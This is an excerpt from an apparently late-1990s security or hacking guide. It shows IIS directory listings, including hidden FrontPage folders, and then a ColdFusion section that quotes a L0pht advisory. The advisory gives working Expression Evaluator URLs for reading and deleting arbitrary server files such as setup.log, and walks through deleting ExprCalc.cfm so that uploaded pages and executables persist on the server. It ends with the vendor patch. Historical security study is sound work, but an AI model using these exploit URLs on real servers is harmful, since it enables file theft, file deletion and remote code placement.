10/18/97 02:17a 4,206 smauh.htm
10/12/97 06:40a 2,292 smcommh.htm
10/12/97 06:40a 4,972 smdelh.htm
10/12/97 06:40a 3,623 smdomedh.htm
10/12/97 06:40a 3,081 smdomh.htm
10/12/97 06:40a 4,261 smmesh.htm
10/12/97 06:40a 1,785 smsech.htm
10/12/97 06:40a 3,930 smserh.htm
10/12/97 06:40a 3,870 smsesh.htm
10/18/97 02:17a 1,411 smsrvh.htm
10/12/97 06:40a 947 start.htm
10/12/97 06:40a 946 stop.htm
10/12/97 06:40a 1,060 temp.htm
10/12/97 06:40a 1,001 testfr.htm
10/12/97 06:40a 1,084 title.htm
10/12/97 06:40a 4,496 toc.htm
10/12/97 06:40a 1,099 tocframe.htm
10/12/97 06:40a 1,131 vsdesc.htm
10/12/97 06:40a 1,165 vsipaddr.htm
10/12/97 06:40a 2,400 welcome.htm
10/12/97 06:40a 1,055 dmremv.htm
10/12/97 06:40a 1,158 dmroute.htm
10/12/97 06:40a 2,045 dmtype.htm
10/12/97 06:40a 1,690 dmusessl.htm
10/12/97 06:40a 1,771 mbaddir.htm
10/12/97 06:40a 1,349 mbadto.htm
10/12/97 06:40a 1,436 mlimcon.htm
10/12/97 06:40a 2,318 mlimit.htm
10/12/97 06:40a 1,831 mmsgsize.htm
10/12/97 06:40a 1,325 mndrto.htm
10/12/97 06:40a 983 mreset.htm
10/12/97 06:40a 987 msave.htm
10/12/97 06:40a 1,671 msessize.htm
10/12/97 06:40a 960 pause.htm
10/12/97 06:40a 2,551 props.htm
10/12/97 06:40a 1,120 refresh.htm
10/12/97 06:40a 964 resume.htm
10/12/97 06:40a 1,762 dlmaxhop.htm
10/12/97 06:40a 1,579 dlmaxrt.htm
10/12/97 06:40a 1,710 dlqual.htm
10/12/97 06:40a 1,207 dlretint.htm
10/12/97 06:40a 1,451 dlrev.htm
10/12/97 06:40a 1,812 dlsmart.htm
10/12/97 06:40a 1,253 dlssl.htm
10/12/97 06:40a 1,271 dltype.htm
10/12/97 06:40a 3,533 dmadd.htm
10/12/97 06:40a 1,266 dmalias.htm
10/12/97 06:40a 1,957 dmaloc.htm
10/12/97 06:40a 1,570 dmaname.htm
10/12/97 06:40a 1,289 dmdefloc.htm
10/12/97 06:40a 1,469 dmdrop.htm
10/12/97 06:40a 2,785 dmedit.htm
10/12/97 06:40a 1,715 dmlocdom.htm
10/12/97 06:40a 1,941 dmname.htm
10/12/97 06:40a 1,675 dmremote.htm
10/12/97 06:40a 1,444 conlimit.htm

56
10/12/97 06:40a 1,118 connect.htm
10/12/97 06:40a 1,050 conport.htm
10/12/97 06:40a 1,242 contout.htm
10/18/97 02:17a 993 delete.htm
10/12/97 06:40a 1,652 dlattmpt.htm
10/12/97 06:40a 1,279 dlmasq.htm
10/18/97 02:17a 1,280 autls.htm
10/18/97 02:17a 1,144 auacct.htm
10/18/97 02:17a 1,480 auchacct.htm
10/18/97 02:17a 1,502 auchnt.htm
10/18/97 02:17a 1,276 auclear.htm
10/18/97 02:17a 1,086 aunoauth.htm
10/18/97 02:17a 1,177 auntacct.htm
10/18/97 02:17a 1,307 auntcr.htm
10/12/97 06:40a 1,337 condir.htm
10/12/97 06:40a 2,962 colegal.htm
88 File(s) 236,714 bytes

Directory of C:\INETPUB\Mail\Smtp\Admin\Images

05/12/99 03:14p <DIR> .


05/12/99 03:14p <DIR> ..
10/12/97 06:39a 1,018 mailbox.gif
10/12/97 06:40a 81 plus.gif
10/12/97 06:40a 82 plusl.gif
10/12/97 06:40a 883 popup.gif
10/12/97 06:40a 82 radiooff.gif
10/12/97 06:40a 84 radioon.gif
10/12/97 06:40a 880 refr.gif
10/12/97 06:40a 881 remv.gif
10/12/97 06:40a 899 roll.gif
10/12/97 06:40a 300 rte.gif
10/12/97 06:40a 888 save.gif
10/12/97 06:40a 148 slideron.gif
10/12/97 06:40a 166 slidersp.gif
10/12/97 06:40a 176 slidrend.gif
10/12/97 06:40a 182 slidroff.gif
10/12/97 06:40a 126 smallkey.gif
10/12/97 06:40a 49 space.gif
10/12/97 06:40a 869 stop.gif
10/12/97 06:39a 818 tablcor.gif
10/12/97 06:40a 49 tabline.gif
10/12/97 06:40a 49 tabottom.gif
10/12/97 06:39a 817 tabrcor.gif
10/12/97 06:39a 800 tabrline.gif
10/12/97 06:40a 583 tabs.gif
10/12/97 06:39a 800 tabwdot.gif
10/12/97 06:40a 269 tbasp.gif
10/12/97 06:40a 273 tbasp0.gif
10/12/97 06:40a 251 tbisapi.gif
10/12/97 06:40a 157 tbother.gif
10/12/97 06:40a 149 updir.gif
10/12/97 06:40a 1,600 vbscript.gif
10/12/97 06:40a 165 vdir0.gif
10/12/97 06:40a 163 vdir2.gif
10/12/97 06:40a 163 vdir4.gif
10/12/97 06:39a 7,667 vrsvrwiz.gif

57
10/12/97 06:40a 225 www0.gif
10/12/97 06:40a 167 www2.gif
10/12/97 06:40a 224 www4.gif
10/12/97 06:40a 1,515 wwwprop.gif
10/12/97 06:40a 369 mime.gif
10/12/97 06:40a 75 minus.gif
10/12/97 06:40a 76 minusl.gif
10/12/97 06:40a 869 new.gif
10/12/97 06:40a 874 next.gif
10/12/97 06:40a 205 off.gif
10/12/97 06:40a 897 ok.gif
10/12/97 06:40a 202 on.gif
10/12/97 06:40a 880 open.gif
10/12/97 06:40a 877 pause.gif
10/12/97 06:40a 1,929 ism.gif
10/12/97 06:40a 3,187 ismhd.gif
10/12/97 06:40a 224 key.gif
10/12/97 06:40a 62 line.gif
10/12/97 06:40a 2,609 loading.gif
10/12/97 06:40a 139 lock.gif
10/12/97 06:40a 1,231 logo.gif
10/12/97 06:40a 869 gnicnew.gif
10/12/97 06:40a 874 gnicnext.gif
10/12/97 06:40a 904 gnicok.gif
10/12/97 06:40a 877 gnicprev.gif
10/12/97 06:40a 880 gnicrefr.gif
10/12/97 06:40a 908 gnicremv.gif
10/12/97 06:40a 906 gnicroll.gif
10/12/97 06:40a 888 gnicsave.gif
10/12/97 06:40a 47 gnictoc0.gif
10/12/97 06:40a 64 gnictoc1.gif
10/12/97 06:40a 64 gnictoc2.gif
10/12/97 06:40a 837 gnicttl.gif
10/12/97 06:40a 860 gnicup.gif
10/12/97 06:40a 267 handshk.gif
10/12/97 06:40a 893 help.gif
10/12/97 06:40a 130 helpnote.gif
10/12/97 06:40a 15,076 iisnav.gif
10/20/97 02:26a 13,033 iisttl.gif
10/12/97 06:40a 173 ftp4.gif
10/12/97 06:40a 1,373 ftpprop.gif
10/12/97 06:40a 919 globe.gif
10/12/97 06:40a 9,920 gnback.gif
10/12/97 06:40a 229 gnicabou.gif
10/12/97 06:40a 98 gniccncl.gif
10/12/97 06:40a 152 gniccomg.gif
10/12/97 06:40a 156 gniccoms.gif
10/12/97 06:40a 170 gnicdis.gif
10/12/97 06:40a 879 gnicdoc.gif
10/12/97 06:40a 862 gnicdown.gif
10/12/97 06:40a 871 gnicdsal.gif
10/12/97 06:40a 149 gnicedit.gif
10/12/97 06:40a 904 gnichelp.gif
10/12/97 06:40a 877 gnickey.gif
10/12/97 06:40a 145 gniclock.gif
10/12/97 06:40a 1,231 gniclogo.gif
10/12/97 06:40a 914 about.gif

58
10/12/97 06:40a 242 access.gif
10/12/97 06:40a 1,010 back.gif
10/12/97 06:40a 909 bkclos.gif
10/12/97 06:40a 932 bkopen.gif
10/12/97 06:40a 832 black.gif
10/12/97 06:40a 65 blank.gif
10/12/97 06:40a 66 blankl.gif
10/12/97 06:40a 880 brws.gif
10/12/97 06:40a 156 cert.gif
10/12/97 06:40a 80 checkoff.gif
10/12/97 06:40a 89 checkon.gif
10/12/97 06:40a 880 cncl.gif
10/12/97 06:40a 129 comp.gif
10/12/97 06:40a 158 comp0.gif
10/12/97 06:40a 158 comp1.gif
10/12/97 06:40a 158 comp2.gif
10/12/97 06:40a 127 comp3.gif
10/12/97 06:40a 131 comp4.gif
10/12/97 06:40a 882 cont.gif
10/12/97 06:39a 1,133 custrecp.gif
10/12/97 06:40a 165 dir0.gif
10/12/97 06:40a 165 dir2.gif
10/12/97 06:40a 165 dir4.gif
10/12/97 06:39a 1,117 distlist.gif
10/12/97 06:40a 879 doc.gif
10/12/97 06:40a 159 drct.gif
10/12/97 06:40a 879 edit.gif
10/12/97 06:40a 152 folder.gif
10/12/97 06:40a 175 ftp0.gif
10/12/97 06:40a 173 ftp2.gif
124 File(s) 110,848 bytes

Directory of C:\INETPUB\scripts

05/12/99 03:17p <DIR> .


05/12/99 03:17p <DIR> ..
2 File(s) 0 bytes

Directory of C:\INETPUB\ftproot

05/12/99 03:18p <DIR> .


05/12/99 03:18p <DIR> ..
2 File(s) 0 bytes

Directory of C:\INETPUB\Catalog.wci

05/12/99 03:18p <DIR> .


05/12/99 03:18p <DIR> ..
05/12/99 03:24p 240 CiSP0000.000
05/12/99 03:24p 65,536 CiSP0000.001
05/12/99 03:24p 65,536 CiSP0000.002
05/12/99 03:24p 240 CiPS0000.000
05/12/99 03:24p 65,536 CiPS0000.001
05/12/99 03:24p 65,536 CiPS0000.002
05/12/99 03:24p 240 CiPT0000.000
05/12/99 03:24p 65,536 CiPT0000.001
05/12/99 03:24p 65,536 CiPT0000.002

59
05/12/99 03:24p 240 CiST0000.000
05/12/99 03:25p 65,536 CiST0000.001
05/12/99 03:25p 65,536 CiST0000.002
05/13/99 06:27a 4,198,912 propstor.bkp
05/12/99 03:24p 131,072 cicat.hsh
05/12/99 03:24p 240 CiVP0000.000
05/12/99 03:24p 65,536 CiVP0000.001
05/12/99 03:24p 65,536 CiVP0000.002
05/12/99 03:24p 240 INDEX.000
05/12/99 03:24p 65,536 INDEX.001
05/12/99 03:24p 65,536 INDEX.002
05/12/99 03:24p 240 CiCL0001.000
05/12/99 03:24p 131,072 CiCL0001.001
05/12/99 03:24p 131,072 CiCL0001.002
05/12/99 03:24p 240 CiSL0001.000
05/12/99 03:24p 0 CiSL0001.001
05/12/99 03:24p 0 CiSL0001.002
05/12/99 03:24p 2,162,688 00000002.prp
05/14/99 12:06a 3,051,520 00010001.ci
05/14/99 12:06a 24,415 00010001.dir
05/14/99 12:06a 240 CiFLfffc.000
05/14/99 12:06a 65,536 CiFLfffc.001
05/14/99 12:06a 65,536 CiFLfffc.002
34 File(s) 10,750,415 bytes

Total Files Listed:


463 File(s) 12,035,314 bytes
590,512,128 bytes free

IIS 3.0 WWW Server Hidden Files and Directories:

Volume in drive C has no label.


Volume Serial Number is EA37-8613

Directory of C:\INETPUB\wwwroot

05/12/99 03:23p <DIR> _vti_pvt


05/12/99 03:23p <DIR> _vti_log
05/12/99 03:23p <DIR> _vti_txt
05/12/99 03:23p <DIR> _vti_cnf
05/12/99 03:23p <DIR> _vti_bin
5 File(s) 0 bytes

Directory of C:\INETPUB\wwwroot\_vti_bin

05/12/99 03:23p <DIR> _vti_adm


05/12/99 03:23p <DIR> _vti_aut
2 File(s) 0 bytes

Directory of C:\INETPUB\wwwroot\cgi-bin

05/12/99 03:23p <DIR> _vti_cnf


1 File(s) 0 bytes

60
Total Files Listed:
8 File(s) 0 bytes
590,479,360 bytes free

61
ColdFusion

ColdFusion (Alaire, Inc) allows database-to-web interaction, and runs on many platforms.
However, it commonly runs on Winodws NT due to the ease of administration as well as
Microsoft Access’ ease of use. Several vulnerabilities exist for the program.

http://XXX.XXX.XXX.XXX/cfdocs/expeval/exprcalc.cfm?OpenFilePath=d:\winn
t\repair\setup.log

This will show you any file on the system.

L0pht has released an advisory on ColdFusion. This is included from the advisory
verbatim:

“By default, the Cold Fusion application server install program installs sample code as
well as online documentation. As part of this collection is a utility called the "Expression
Evaluator". The purpose of this utility is to allow developers to easily experiment with
Cold Fusion expressions. It is even allows you to create a text file on your local machine
and then upload it to the application server in order to evaluate it. This utility is supposed
to be limited to the localhost.

There are basically 3 important files in this exploit that any web user can access by
default: "/cfdocs/expeval/openfile.cfm", "/cfdocs/expeval/displayopenedfile.cfm" and
"/cfdocs/expeval/exprcalc.cfm". The first one lets you upload a file via a web form. The
second one saves the file to the server. The last file reads the uploaded file, displays
the contents of the file in a web form and then deletes the uploaded file.

The Phrack article and the advisory from Allaire relate to "exprcalc.cfm". A web user can
choose to view and delete any file they want. To view and delete a file like
"c:\winnt\repair\setup.log" you would use a URL like:
http://www.server.com/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:
\winnt\repair\setup.log

This exploit can be taken a step further. First go to:


http://www.server.com/cfdocs/expeval/openfile.cfm

Select a file to upload from your local machine and submit it. You will then be forwarded
to a web page displaying the contents of the file you uploaded. The URL will look
something like:
http://www.server.com/cfdocs/expeval/ExprCalc.cfm?RequestTimeout=
2000&OpenFilePath=C:\Inetpub\wwwroot\cfdocs\expeval\.\myfile.txt

Now replace the end of the URL where it shows ".\myfile.txt" with
"ExprCalc.cfm". Going to this URL will delete "ExprCalc.cfm" so that web users can
now use "openfile.cfm" to upload files to the web server without them being deleted.
With some knowledge of Cold Fusion a web user can upload a Cold Fusion page that
allows them to browse directories on the server as well as upload, download and delete
files. Arbitrary executable files could placed anywhere the Cold Fusion service has
access. Web users are not restricted to the web root.

Frequently, Cold Fusion developers use Microsoft Access databases to store information
for their web applications. If the described vulnerability exists on your server, these
database files could potentially be downloaded and even overwritten with modified
copies.

62
The most concerning aspect of this vulnerability is that with a text editor and a web
browser, web users are able to download password files, other confidential information
and even upload executable files to a web server.

III. Solution

Allaire has posted a patch to this vulnerability. This is currently available at:
http://www.allaire.com/handlers/index.cfm?ID=8727&Method=Full
In addition to this, it is recommended that the documentation and example code not be
stored on production servers.“

63

You might also like